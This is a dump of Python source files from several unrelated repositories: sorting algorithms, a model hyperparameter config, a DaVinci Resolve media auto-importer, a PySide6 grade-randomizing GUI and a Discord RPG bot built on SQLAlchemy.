    # "i -= 1" inside a for-loop has no effect in Python, so retry with a while-loop
    while generated < 1000:
        new_passwd = gen_passwd('4')  # initial must be a string; an int would raise TypeError
        if new_passwd not in account_passwd_dict.keys():
            account_passwd_dict[new_passwd] = f'account{<PASSWORD>}'
            generated += 1
    save_passwd_to_csv(account_passwd_dict)
```
|
{
"source": "jedxops/sorting",
"score": 3
}
|
#### File: jedxops/sorting/insertion_sort.py
```python
import sys
import random
import time
# insertion sorting algorithm
# taken from D. LeBlanche's slides: http://web.cecs.pdx.edu/~dleblanc/cs350/sorting.pdf
# also an inspiration of: https://github.com/aligoren/pyalgo/blob/master/insertionSort.py
# credit to that github user (LICENSE at the bottom of this file)
def insertion_sort(A):
for j in range(1, len(A)):
key = A[j]
i = j
while i > 0 and A[i - 1] > key:
A[i] = A[i - 1]
i = i - 1
A[i] = key
return A
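# Insertion sort takes O(n^2) comparisons in the worst case and O(n) on
# already-sorted input; e.g. insertion_sort([3, 1, 2]) returns [1, 2, 3].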
# generate list
def gen_list(size):
random.seed()
# n = random.randint(0, size)
liss = []
i = 0
while i < size:
liss.append(random.randint(0, 100)) # fill the list with values from zero to 100
i = i + 1
return liss
def main():
    if len(sys.argv) < 2:  # argv[0] is the script name, so at least one real argument is required
        print("Error. Not enough arguments")
        return
    size = int(sys.argv[1])
    ticks1 = time.time()
    data = gen_list(size)  # renamed from "list" to avoid shadowing the builtin
    ticks2 = time.time()
    # formatting idea came from: https://stackoverflow.com/questions/8595973/truncate-to-three-decimals-in-python
    print("Total time to generate list in seconds: " + str('%.3f'%(ticks2 - ticks1)) + '.')
    ticks1 = time.time()
    result = insertion_sort(data)  # renamed from "sorted" to avoid shadowing the builtin
    ticks2 = time.time()
    print("Total insertion sort time taken in seconds: " + str('%.3f'%(ticks2 - ticks1)) + '.')
    # print("Sorted: ")
    # print(result)
    return
if __name__ == '__main__':
main()
'''
The MIT License (MIT)
Copyright (c) 2015 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
```
#### File: jedxops/sorting/merge_sort.py
```python
import sys
import random
import time
# merge sort algorithm
# taken from D. LeBlanche's slides: http://web.cecs.pdx.edu/~dleblanc/cs350/sorting.pdf
def merge_sort(A):
if len(A) == 0:
return []
if len(A) == 1:
return A
    mid = len(A) // 2  # integer division already floors, so math.floor is redundant
#for i in range(mid - 1): #these were making my code run infinitely.
#B.append(A[i]) #slice operators saved the day!
B = merge_sort(A[:mid])
#for i in range(mid, len(A) - 1):
# C.append(A[i])
C = merge_sort(A[mid:])
return merge_lists(B, C)
# merge two lists
# taken from D. LeBlanche's slides: http://web.cecs.pdx.edu/~dleblanc/cs350/sorting.pdf
def merge_lists(B, C):
i = 0
j = 0
A = []
while i < len(B) and j < len(C):
if B[i] <= C[j]:
A.append(B[i])
i = i + 1
else:
A.append(C[j])
j = j + 1
if i == len(B):
Z = []
for i in range(j, len(C)):
Z.append(C[i])
A = A + Z
else:
Z = []
for k in range(i, len(B)):
Z.append(B[k])
A = A + Z
return A
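# merge_lists runs in O(len(B) + len(C)) time, which makes merge_sort
# O(n log n) overall; e.g. merge_sort([3, 1, 2]) returns [1, 2, 3].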
# generate list
def gen_list(size):
random.seed()
# n = random.randint(0, size)
liss = []
i = 0
while i < size:
liss.append(random.randint(0, 100)) # fill the list with values from zero to 100
i = i + 1
return liss
def main():
    if len(sys.argv) < 2:  # argv[0] is the script name, so at least one real argument is required
        print("Error. Not enough arguments")
        return
    size = int(sys.argv[1])
    ticks1 = time.time()
    data = gen_list(size)  # renamed from "list" to avoid shadowing the builtin
    ticks2 = time.time()
    # formatting idea came from: https://stackoverflow.com/questions/8595973/truncate-to-three-decimals-in-python
    print("Total time to generate list in seconds: " + str('%.3f'%(ticks2 - ticks1)) + '.')
    ticks1 = time.time()
    data = merge_sort(data)
    ticks2 = time.time()
    print("Total merge sort time taken in seconds: " + str('%.3f'%(ticks2 - ticks1)) + '.')
    #print("sorted")
    #print(data)
    return
if __name__ == '__main__':
main()
```
|
{
"source": "jedyang97/MTAG",
"score": 2
}
|
#### File: jedyang97/MTAG/consts.py
```python
from best_metrics import Best
class GlobalConsts:
single_gpu = True
load_model = False
save_grad = False
dataset = "mosi"
data_path = "/workspace/dataset/"
log_path = None
padding_len = -1
include_zero = True
# cellDim = 150
# normDim = 100
# hiddenDim = 300
config = {
"seed": 0,
"batch_size": 2,
"epoch_num": 50,
"cuda": 0,
"global_lr": 1e-4,
"gru_lr": 1e-4,
"beta1": 0.9,
"beta2": 0.999,
"eps": 1e-8,
'weight_decay': 1e-2,
'momentum': 0.9,
"gnn_dropout": 0.1,
"num_modality": 3,
"num_frames": 50,
"temporal_connectivity_order": 5,
"num_vision_aggr": 1,
"num_text_aggr": 1,
"num_audio_aggr": 1,
"text_dim": 300,
"audio_dim": 5,
"vision_dim": 20,
"graph_conv_in_dim": 512,
"graph_conv_out_dim": 512,
"gat_conv_num_heads": 4,
"transformer_nhead": 4,
"transformer_nhid": 1024,
"transformer_nlayers": 6,
}
device = None
best = Best()
    def logParameters(self):
        print("Hyperparameters:")
        for name in dir(GlobalConsts):
            if name.find("__") == -1 and name.find("max") == -1 and name.find("min") == -1:
                print("\t%s: %s" % (name, str(getattr(GlobalConsts, name))))
```
|
{
"source": "jedybg/resolve-advanced-importer",
"score": 2
}
|
#### File: jedybg/resolve-advanced-importer/init.py
```python
import base64
import tkinter as tk
from PIL import ImageTk, Image
from icon import icon
mainWindow = tk.Tk()
def InitializeTkWindow():
mainWindow.title("DaVinci Resolve Advanced Importer")
mainWindow.resizable(False, False)
mainWindow.call('wm', 'iconphoto', mainWindow._w, ImageTk.PhotoImage(data=base64.b64decode(icon)))
```
#### File: jedybg/resolve-advanced-importer/resolveImporter.py
```python
import os
import threading
import config as c
from resolve import (mediaPool)
from time import sleep
from tkinter.messagebox import showerror
from resolveBinTree import ResolveBinTree
class ResolveImporter(threading.Thread):
IMPORTED_MESSAGE_DURATION = 0.7
importerThread = None
def __init__(self, directory) -> None:
super().__init__()
self._stop = threading.Event()
self.directory = directory
def stop(self):
self._stop.set()
    def stopped(self):
        return self._stop.is_set()  # Event.isSet() is deprecated in favor of is_set()
def run(self):
while True:
sleepDuration = c.sleepBetweenChecks - self.IMPORTED_MESSAGE_DURATION
if not self.updateMessage("Importing"): return
sleep(sleepDuration/3)
if not self.updateMessage("Importing."): return
sleep(sleepDuration/3)
if not self.updateMessage("Importing.."): return
sleep(sleepDuration/3)
if not self.updateMessage("Importing..."): return
self.importDir()
if c.timelinesBin or c.compoundClipsBin or c.fusionCompsBin:
master = ResolveBinTree.get()
if c.timelinesBin:
timelines = master.getTimelines()
timelinesToMove = []
for timeline in timelines:
if not c.timelinesBin.hasClip(timeline):
timelinesToMove.append(timeline)
if len(timelinesToMove) > 0:
c.timelinesBin.moveClipsToBin(timelinesToMove)
print(f"[Resolve Importer] Moved {[t.GetClipProperty('Clip Name') for t in timelinesToMove]} timelines to {c.timelinesBin.getPath()}")
if c.compoundClipsBin:
compoundClips = master.getCompoundClips()
compoundClipsToMove = []
for clip in compoundClips:
if not c.compoundClipsBin.hasClip(clip):
compoundClipsToMove.append(clip)
if len(compoundClipsToMove) > 0:
c.compoundClipsBin.moveClipsToBin(compoundClipsToMove)
print(f"[Resolve Importer] Moved {[c.GetClipProperty('Clip Name') for c in compoundClipsToMove]} compound clips to {c.compoundClipsBin.getPath()}")
if c.fusionCompsBin:
fusionComps = master.getFusionComps()
fusionCompsToMove = []
for clip in fusionComps:
if not c.fusionCompsBin.hasClip(clip):
fusionCompsToMove.append(clip)
if len(fusionCompsToMove) > 0:
c.fusionCompsBin.moveClipsToBin(fusionCompsToMove)
print(f"[Resolve Importer] Moved {[c.GetClipProperty('Clip Name') for c in fusionComps]} fusion comps to {c.fusionCompsBin.getPath()}")
master.refresh()
if not self.updateMessage("Importing... Finished Import"): return
sleep(self.IMPORTED_MESSAGE_DURATION)
# returns false if stopped
def updateMessage(self, message):
if self.stopped():
c.importedMessage.set("")
return False
c.importedMessage.set(message)
return True
def importDir(self):
print(f"[Resolve Importer] Importing from {self.directory} to {c.importToBin.getPath()}")
c.importToBin.refresh()
c.importToBin.syncBinWithFolder(self.directory, recursive = True)
def toggleImport():
if(ResolveImporter.importerThread):
print(f"[Resolve Importer] Stopping to Import from {c.folderPath.get()} to bin {c.importToBin.getPath()}")
c.importing.set(False)
ResolveImporter.importerThread.stop()
ResolveImporter.importerThread = None
else:
if not ResolveImporter.validateImportPath():
return
c.saveCache()
print(f"[Resolve Importer] Starting to Import from {c.folderPath.get()} to bin {c.importToBin.getPath()}")
c.importing.set(True)
c.importedMessage.set("Importing")
ResolveImporter.importerThread = ResolveImporter(c.folderPath.get())
ResolveImporter.importerThread.daemon = True
ResolveImporter.importerThread.start()
def validateImportPath():
if not os.path.isdir(c.folderPath.get()):
showerror(title="Error", message="Invalid import path. Please check your path config and try again.")
return False
return True
```
#### File: jedybg/resolve-advanced-importer/resolve.py
```python
import sys
import imp
import os
import json
import config as c
def GetResolve():
scriptModule = None
try:
import fusionscript as scriptModule
except ImportError:
resolvePath = c.getResolvePath()
# Look for an auto importer config path
if resolvePath:
try:
scriptModule = imp.load_dynamic("fusionscript", resolvePath)
except ImportError:
print("[Resolve Importer] Failed to load resolve at config path: " + resolvePath)
pass
if not scriptModule:
# Look for installer based environment variables:
libPath=os.getenv("RESOLVE_SCRIPT_LIB")
if libPath:
try:
scriptModule = imp.load_dynamic("fusionscript", libPath)
except ImportError:
pass
if not scriptModule:
# Look for default install locations:
ext=".so"
if sys.platform.startswith("darwin"):
path = "/Applications/DaVinci Resolve/DaVinci Resolve.app/Contents/Libraries/Fusion/"
elif sys.platform.startswith("win") or sys.platform.startswith("cygwin"):
ext = ".dll"
path = "C:\\Program Files\\Blackmagic Design\\DaVinci Resolve\\"
elif sys.platform.startswith("linux"):
path = "/opt/resolve/libs/Fusion/"
try:
scriptModule = imp.load_dynamic("fusionscript", path + "fusionscript" + ext)
except ImportError:
pass
if scriptModule:
sys.modules["DaVinciResolveScript"] = scriptModule
import DaVinciResolveScript as bmd
else:
raise ImportError("Could not locate module dependencies")
return bmd.scriptapp("Resolve")
resolve = GetResolve()
projectManager = resolve.GetProjectManager()
project = projectManager.GetCurrentProject()
mediaPool = project.GetMediaPool()
mediaStorage = resolve.GetMediaStorage()
```
|
{
"source": "jedymatt/ClassGenie",
"score": 2
}
|
#### File: jedymatt/ClassGenie/app.py
```python
import pandas as pd
import xlwings as xw
from PySide6.QtGui import QIntValidator
from PySide6.QtGui import Qt
from PySide6.QtWidgets import QApplication
from PySide6.QtWidgets import QDialog
from PySide6.QtWidgets import QFileDialog
from PySide6.QtWidgets import QHeaderView
from PySide6.QtWidgets import QItemDelegate
from PySide6.QtWidgets import QLineEdit
from PySide6.QtWidgets import QListWidgetItem
from PySide6.QtWidgets import QMainWindow
from PySide6.QtWidgets import QTableWidgetItem
from qt_material import apply_stylesheet
from class_record import ClassSheet
from class_record import randomizer
from ui.AboutDialog import Ui_AboutDialog
from ui.EditGradesDialog import Ui_EditGradesDialog
from ui.InputGradesDialog import Ui_InputGradesDialog
from ui.MainWindow import Ui_MainWindow
from ui.OptionDialog import Ui_OptionDialog
from version import __version__
RANDOMIZER_MAX_LOOP = 100_000
RANDOMIZER_THRESHOLD = 1.6
class IntDelegate(QItemDelegate):
def createEditor(self, parent, option, index):
editor = QLineEdit(parent)
editor.setValidator(QIntValidator())
return editor
class AboutDialog(QDialog):
def __init__(self, parent):
super().__init__(parent)
self.ui = Ui_AboutDialog()
self.ui.setupUi(self)
self.ui.labelAuthor.setText('jedymatt')
self.ui.versionLabel.setText(__version__)
class EditGradesDialog(QDialog):
def __init__(self, parent, cs):
super().__init__(parent)
self.ui = Ui_EditGradesDialog()
self.ui.setupUi(self)
self.cs = cs
self.ui.pushButton.clicked.connect(self.generate)
def generate(self):
offset_value = self.ui.spinBox.value()
for sr in self.cs.student_records:
expected_average = sr.transmuted_average + offset_value
overwrite_all = self.ui.checkBox.isChecked()
randomizer.randomize_student_record(sr, expected_average, self.cs.head_components,
max_loop=RANDOMIZER_MAX_LOOP,
threshold=RANDOMIZER_THRESHOLD,
overwrite_all=overwrite_all)
# save scores to excel
QApplication.setOverrideCursor(Qt.WaitCursor)
self.cs.save_sheet()
QApplication.restoreOverrideCursor()
self.close()
class InputGradesDialog(QDialog):
def __init__(self, parent, cs: ClassSheet):
super().__init__(parent)
self.ui = Ui_InputGradesDialog()
self.ui.setupUi(self)
self.cs = cs
df = pd.DataFrame([[student.name, ''] for student in self.cs.student_records])
self.df = df
self.ui.tableWidget.setRowCount(df.shape[0])
self.ui.tableWidget.setColumnCount(df.shape[1])
self.ui.checkBox.setChecked(True)
self.ui.tableWidget.setHorizontalHeaderLabels(["Learner's Names", "New Average"])
self.ui.tableWidget.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.ui.tableWidget.horizontalHeader().setStretchLastSection(True)
self.ui.tableWidget.setItemDelegateForColumn(1, IntDelegate())
for row in range(self.ui.tableWidget.rowCount()):
for col in range(self.ui.tableWidget.columnCount()):
item = QTableWidgetItem(str(self.df.iloc[row, col]))
self.ui.tableWidget.setItem(row, col, item)
self.ui.tableWidget.cellChanged[int, int].connect(self.update_df)
self.ui.pushButton.clicked.connect(self.generate)
def update_df(self, row, column):
text = self.ui.tableWidget.item(row, column).text()
self.df.iloc[row, column] = text
def generate(self):
for row in self.df.iterrows():
row_idx, values = row
if values[1] is not None and values[1] != '':
value = str(self.df.iloc[row_idx, 1])
overwrite_all = bool(self.ui.checkBox.checkState())
randomizer.randomize_student_record(self.cs.student_records[row_idx], int(value),
self.cs.head_components, max_loop=RANDOMIZER_MAX_LOOP,
overwrite_all=overwrite_all, threshold=RANDOMIZER_THRESHOLD)
# save scores to excel
QApplication.setOverrideCursor(Qt.WaitCursor)
self.cs.save_sheet()
QApplication.restoreOverrideCursor()
self.close()
class OptionDialog(QDialog):
def __init__(self, parent, title, cs: ClassSheet):
super().__init__(parent)
self.ui = Ui_OptionDialog()
self.ui.setupUi(self)
self.setWindowTitle(title)
self.cs = cs
self.input_grades = None
self.edit_grades = None
self.ui.buttonNewAverage.clicked.connect(self.create_new_average)
self.ui.buttonExistingAverage.clicked.connect(self.edit_existing_average)
def create_new_average(self):
QApplication.setOverrideCursor(Qt.WaitCursor)
self.input_grades = InputGradesDialog(self, self.cs)
QApplication.restoreOverrideCursor()
self.input_grades.show()
def edit_existing_average(self):
self.edit_grades = EditGradesDialog(self, self.cs)
self.edit_grades.show()
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.setWindowTitle('Class Genie')
self.ui.listWidget.hide()
self.ui.pushButton.hide()
self.app = xw.App(visible=False, add_book=False)
self.wb = None
self.cs = None
self.dialog = None
self.about = AboutDialog(self)
self.ui.actionOpen.triggered.connect(self.open_workbook)
self.ui.actionAbout.triggered.connect(lambda: self.about.show())
self.ui.pushButton.clicked.connect(self.edit_selected)
def open_workbook(self):
url = QFileDialog.getOpenFileName(self, filter='Excel Files (*.xlsx)')
if url[0]:
if self.app.books:
print('has active')
self.app.books.active.close()
self.ui.listWidget.clear()
QApplication.setOverrideCursor(Qt.WaitCursor)
self.wb: xw.Book = self.app.books.open(url[0], update_links=False)
QApplication.restoreOverrideCursor()
self.ui.listWidget.show()
self.ui.pushButton.show()
            for sheet in self.wb.sheets:
                item = QListWidgetItem(sheet.name)
                item.setData(1, sheet)
                self.ui.listWidget.addItem(item)  # add the prepared item, not just the bare name
def edit_selected(self):
index: QListWidgetItem = self.ui.listWidget.currentItem()
if index is None:
return
sheet = self.wb.sheets[index.text()]
self.cs = ClassSheet(sheet)
self.dialog = OptionDialog(self, index.text(), self.cs)
self.dialog.show()
    def closeEvent(self, event):
        if self.wb is not None:  # no workbook is open if the user never loaded one
            self.wb.close()
        self.app.quit()
if __name__ == '__main__':
app = QApplication([])
main_window = MainWindow()
main_window.show()
apply_stylesheet(app, 'dark_red.xml')
app.exec()
```
#### File: ClassGenie/ui/AboutDialog.py
```python
from PySide6.QtCore import * # type: ignore
from PySide6.QtGui import * # type: ignore
from PySide6.QtWidgets import * # type: ignore
class Ui_AboutDialog(object):
def setupUi(self, AboutDialog):
if not AboutDialog.objectName():
AboutDialog.setObjectName(u"AboutDialog")
AboutDialog.resize(270, 207)
self.verticalLayout = QVBoxLayout(AboutDialog)
self.verticalLayout.setObjectName(u"verticalLayout")
self.appLabel = QLabel(AboutDialog)
self.appLabel.setObjectName(u"appLabel")
sizePolicy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.appLabel.sizePolicy().hasHeightForWidth())
self.appLabel.setSizePolicy(sizePolicy)
font = QFont()
font.setPointSize(28)
self.appLabel.setFont(font)
self.verticalLayout.addWidget(self.appLabel)
self.versionLabel = QLabel(AboutDialog)
self.versionLabel.setObjectName(u"versionLabel")
self.verticalLayout.addWidget(self.versionLabel)
self.labelAuthor = QLabel(AboutDialog)
self.labelAuthor.setObjectName(u"labelAuthor")
self.verticalLayout.addWidget(self.labelAuthor, 0, Qt.AlignRight)
self.retranslateUi(AboutDialog)
QMetaObject.connectSlotsByName(AboutDialog)
# setupUi
def retranslateUi(self, AboutDialog):
AboutDialog.setWindowTitle(QCoreApplication.translate("AboutDialog", u"About", None))
self.appLabel.setText(QCoreApplication.translate("AboutDialog", u"<html><head/><body><p align=\"center\">Class Genie</p></body></html>", None))
self.versionLabel.setText(QCoreApplication.translate("AboutDialog", u"versionLabel", None))
self.labelAuthor.setText(QCoreApplication.translate("AboutDialog", u"AuthorLabel", None))
# retranslateUi
```
|
{
"source": "jedymatt/simple-rpg",
"score": 2
}
|
#### File: simple-rpg/cogs/adventure.py
```python
import random
from random import randint
import discord
from discord import Colour
from discord import Embed
from discord.ext import commands
from discord.ext import menus
from sqlalchemy.exc import NoResultFound
from sqlalchemy.orm import noload, joinedload
from sqlalchemy.sql import func
from cogs.utils import images, errors
from cogs.utils import player as pl
from cogs.utils.character import BattleSimulator, NameAmount
from cogs.utils.character import adjust_hostile_enemy
from cogs.utils.character import level_up
from cogs.utils.character import next_exp
from cogs.utils.character import player_changed_attribute
from cogs.utils.character import random_boolean
from cogs.utils.paginator import EmbedListPage, LocationListPage
from cogs.utils.paginator import record_embed
from cogs.utils.query import get_player, get_hostile, get_modifier
from db import session
from models import Hostile, Loot, LocationLoot, ItemLoot
from models import Location
from models import Modifier
from models import Player
from models import PlayerItem
from models import User
class Adventure(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=['go', 'travel', 'travelto', 'venture', 'ventureto'])
async def goto(self, ctx, *, location: str):
"""Travel to a specific location"""
author_id = ctx.author.id
try:
location = session.query(Location).filter(
func.lower(Location.name) == location.lower()
).one()
except NoResultFound:
raise commands.UserInputError(f"\"{location}\" not found, try again.")
player: Player = session.query(Player).options(
noload(Player.attribute),
noload(Player.items)
).join(User).filter(
User.discord_id == author_id
).one()
if player.level >= location.level_requirement:
player.location = location
else:
            raise errors.LevelNotReached(f"Can't venture to \"{location.name}\"")
await ctx.send('success')
@goto.error
async def goto_error(self, ctx, error):
if isinstance(error, errors.LevelNotReached):
embed = Embed(
colour=discord.Colour.red(),
title=error.args[0]
)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url
)
embed.description = "Your level is too low, and you might get hurt the during your travel. " \
"Don't worry! You can try again when you're strong enough."
await ctx.send(embed=embed)
elif isinstance(error, commands.UserInputError):
await ctx.send(error.args[0])
else:
raise error
@commands.command()
async def hunt(self, ctx: commands.Context):
"""Explore the surrounding"""
player = get_player(session, ctx.author.id)
# find IDs of Hostile(s) in the current location of the Player,
# then generate & select random hostile
hostile_ids = session.query(Hostile.id).join(Location).filter(
Location.id == player.location.id
).all()
random_hostile_id = random.choice(hostile_ids).id
enemy = get_hostile(session, random_hostile_id, make_transient_=True)
if player.level >= player.location.level_requirement:
# generate level in random +2 above level of player
new_level = random.randint(player.level, player.level + 2)
else:
# generate level in random -2 below level of level requirement
new_level = random.randint(player.location.level_requirement - 2,
player.location.level_requirement)
# 40% chance of hostile with modifier appearing
modifier = None
if random_boolean(0.40):
modifier_ids = session.query(Modifier.id).all()
modifier_id = random.choice(modifier_ids).id
modifier = get_modifier(session, modifier_id)
# adjust attribute of enemy according to its level
adjust_hostile_enemy(new_level, enemy, modifier)
# Battle simulation
# first attacker is Player
battle = BattleSimulator(player, enemy)
winner = battle.start()
# end simulation
# records of the battle
player_record = battle.character_record
enemy_record = battle.opponent_record
str_message = ''
result_embed = Embed(
title='Hunt Result:',
colour=discord.Colour.gold()
)
if winner is player:
str_message = 'You defeated the enemy!'
result_embed.add_field(
name='Rewards',
value="Exp +{}\nMoney +{}".format(
enemy.loot.exp, enemy.loot.money
),
inline=False
)
# reward exp and gold
player.money += enemy.loot.money
player.exp += enemy.loot.exp
rewards = []
# randomly generate a chance to receive drop item
for item_loot in enemy.loot.item_loots:
if random_boolean(item_loot.drop_chance):
random_amount = randint(item_loot.min, item_loot.max)
pl.add_item(player.items, item_loot.item, random_amount)
rewards.append(
NameAmount(
name=item_loot.item.name,
amount=random_amount
)
)
if len(rewards) != 0:
result_embed.add_field(
name='Items',
value="\n".join(f"{reward.name} +{reward.amount}" for reward in rewards),
inline=False
)
if player.exp >= next_exp(player.level):
old_level = player.level
raised_level = level_up(player)
raised_attribute = player_changed_attribute(old_level, player.level)
pl.player_scale_attribute(player.level, player.attribute)
raised_values = [
('New Level: {}', [player.level]),
('Max HP +{}', [raised_attribute.max_hp]),
('Strength +{}', [raised_attribute.strength]),
('Defense +{}', [raised_attribute.defense])
]
result_embed.add_field(
name=f"You leveled up by {raised_level}",
value="\n".join(value[0].format(*value[1]) for value in raised_values)
)
elif winner is enemy:
str_message = 'You fainted!'
else:
if battle.character_record.has_escaped:
str_message = 'You escaped!'
elif battle.opponent_record.has_escaped:
str_message = 'Enemy escaped!'
result_embed.description = str_message
result_embed.set_thumbnail(url=images.DEFAULT)
entries = [
result_embed,
record_embed('Performance', ctx.author.display_name, player, player_record,
thumbnail_url=ctx.author.avatar_url),
record_embed('Performance', enemy.name, enemy, enemy_record)
]
for entry in entries:
entry.set_author(name=ctx.author.display_name, icon_url=ctx.author.avatar_url)
pages = menus.MenuPages(
source=EmbedListPage(global_message=str_message, embeds=entries),
clear_reactions_after=True,
)
# db_session.commit()
await pages.start(ctx)
@commands.command(aliases=['places', 'areas'])
async def locations(self, ctx):
locations = session.query(Location).all()
pages = menus.MenuPages(source=LocationListPage(entries=locations),
clear_reactions_after=True)
await pages.start(ctx)
@commands.command()
# @commands.cooldown(1, 60, commands.BucketType.user)
async def gather(self, ctx):
"""Gather raw materials, sometimes fails, sometimes encounters mobs"""
player, loot = session.query(Player, Loot) \
.select_from(Player) \
.join(Location, Location.id == Player.location_id) \
.join(LocationLoot, Location.id == LocationLoot.location_id) \
.join(Loot, Loot.id == LocationLoot.loot_id) \
.join(User, User.player_id == Player.id) \
.options(joinedload(Player.location),
joinedload(Player.items).subqueryload(PlayerItem.item),
joinedload(Loot.item_loots).subqueryload(ItemLoot.item)) \
.filter(User.discord_id == ctx.author.id).one()
gains = [('Money', loot.money)]
player.money += loot.money
for item_loot in loot.item_loots:
success = random_boolean(item_loot.drop_chance)
if success:
item = item_loot.item
amount = randint(item_loot.min, item_loot.max)
gains.append((item.name, amount))
# add the item and amount to player.items
pl.add_item(player_items=player.items, item=item, amount=amount)
# declare embed
embed = Embed(
title='Obtained',
colour=Colour.green()
)
embed.set_author(name=ctx.author.display_name, icon_url=ctx.author.avatar_url)
embed.description = "\n".join(f"{gain[0]} +{gain[1]}" for gain in gains)
# send output
await ctx.send(embed=embed)
@gather.error
    async def gather_error(self, ctx, error):
        if isinstance(error, commands.CommandOnCooldown):
            await ctx.send(str(error))  # send a readable message rather than the raw args tuple
else:
raise error
def setup(bot: commands.Bot):
bot.add_cog(Adventure(bot))
```
#### File: simple-rpg/cogs/general.py
```python
from discord.ext import commands
from db.connector import session
# def query_player(user_id):
# """
# Finds user's character from database.
#
# Args:
# user_id: discord user id
#
# Returns:
# Character: Character that matches the user's id
#
# Raises:
# CharacterNotFound: If the character is not found in the database
# """
#
# result = session.query(Player).filter(User.discord_id == user_id).one()
#
# if result is None:
# raise CharacterNotFound('Character not found in the database.')
#
# return result
#
#
# def get_item(item_name: str, items):
# for item in items:
# if str(item.name).lower() == item_name.lower():
# return item
#
# return None
# def split_str_int(arg: str):
# """
#
# Splits the string into new string and integer.
# Default integer is 1 if not specified.
#
# Args:
# arg: string with any content followed by integer
#
# Returns: string and integer
# """
# arg = arg.split(' ')
# size = len(arg)
#
# integer = arg[size - 1]
#
# try:
# integer = int(integer)
# string = ' '.join(arg[:size - 1])
# except ValueError:
# integer = 1
# string = ' '.join(arg)
#
# return string, integer
class Adventurer(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.locations = None
self.item_plans = None
self.shop_items = None
# @commands.Cog.listener()
# async def on_ready(self):
# # query locations
# self.locations = session.query(Location).all()
#
# print('Locations loaded:', end=' ')
# print([location.name for location in self.locations])
#
# # self.item_plans = session.query(ItemPlan).all()
# # print('Loaded ItemPlans:')
# # for item_plan in self.item_plans:
# # print(item_plan.item)
# #
# # # load shop items
# # self.shop_items = session.query(ShopItem).all()
# # print('Loaded ShopItems:')
# # for shop_item in self.shop_items:
# # print(shop_item.item)
#
# @commands.command()
# async def attack(self, ctx):
# pass
#
# @commands.command()
# async def duel(self, ctx, mentioned_user):
# pass
#
# @commands.command()
# async def goto(self, ctx, *, location_name: str):
# """Go to another place"""
# author_id = ctx.author.id
# player = query_player(author_id)
#
# location_name = location_name.lower()
#
# for location in self.locations:
# if location_name == str(location.name).lower():
# player.location = location
#
# session.commit()
# @commands.command(aliases=['plan', 'plans'])
# async def item_plan(self, ctx):
# """Show list of craftable items"""
#
# embed = discord.Embed(
# title='Craft',
# colour=discord.Colour.purple()
# )
#
# embed.set_author(name=ctx.author.name, icon_url=ctx.author.avatar_url)
#
# for item_plan in self.item_plans:
# str_materials = '\n'.join([f"{mat.amount} {mat.item.name}" for mat in item_plan.materials])
#
# embed.add_field(
# name=item_plan.item.name,
# value=str_materials,
# inline=False
# )
#
# await ctx.send(embed=embed)
# @commands.command()
# async def craft(self, ctx, *, arg: str):
# item = arg.lower()
# author_id = ctx.author.id
#
# player = query_player(author_id)
#
# item_plan: ItemPlan = get_item(item, self.item_plans)
#
# if item_plan:
#
# plan_mats = {} # create dictionary for the materials
# for mat in item_plan.materials:
# plan_mats[mat.name] = mat.amount
#
# char_items = {} # create dictionary for the player items
# for c_item in player.items:
# char_items[c_item.name] = c_item.amount
#
# if all(key in char_items for key in plan_mats.keys()):
# for name in plan_mats:
# char_amount = char_items[name]
#
# if char_amount < plan_mats[name]: # check if player item amount is less than the required amount
# raise InsufficientAmount('Required amount is not enough')
#
# # deduct amount from the required amount
# char_items[name] -= plan_mats[name]
#
# # after traversing the mats, copy remaining amounts of char_items to the player.items
# while char_items: # char_items is not empty
# for c_item in player.items:
# name = c_item.name
# if name in char_items:
# c_item.amount = char_items[name]
# del char_items[name]
#
# item = get_item(item_plan.item.name, player.items)
# if item:
# item.amount += 1
# else:
# player.items.append(PlayerItem(item=item_plan.item, amount=1))
#
# else:
# raise InsufficientItem('not enough materials')
# else:
# raise ItemNotFound('invalid item')
#
# session.commit()
# @commands.command(aliases=['loc', 'location', 'locations', 'place'])
# async def places(self, ctx: commands.Context):
# """Show places"""
# embed = discord.Embed(
# title='Places',
#
# colour=discord.Colour.purple()
# )
#
# embed.set_author(name=ctx.author.name, icon_url=ctx.author.avatar_url)
#
# # _embed.set_thumbnail(url= map thumbnail)
#
# char = query_player(ctx.author.id)
#
# embed.add_field(
# name="Current Location",
# value=str(char.location.name if char.location else 'None'),
# inline=False
# )
#
# str_loc = '\n'.join([f"{location.name} - *{location.description}*" for location in self.locations])
#
# embed.add_field(
# name='All Places',
# value=str_loc
# )
#
# await ctx.send(embed=embed)
#
# @commands.command()
# async def gather(self, ctx):
# """Gather raw materials"""
# pass
#
# @commands.command()
# async def explore(self, ctx):
# """Explore the current area"""
#
# @commands.command()
# async def profile(self, ctx: commands.Context):
# """Show profile"""
# user_id = ctx.author.id
#
# # if user_id not in self.characters:
# # self.characters[user_id] = query_character(user_id)
#
# player = query_player(user_id)
#
# # Embedded format
# embed = discord.Embed(
# title=f"{ctx.author.name}'s profile",
# colour=discord.Colour.orange(),
# )
#
# embed.set_author(name=ctx.author.name, icon_url=ctx.author.avatar_url)
# # _embed.set_thumbnail(url= avatar logo)
#
# embed.add_field(
# name='Details',
# value="Level: {}\n"
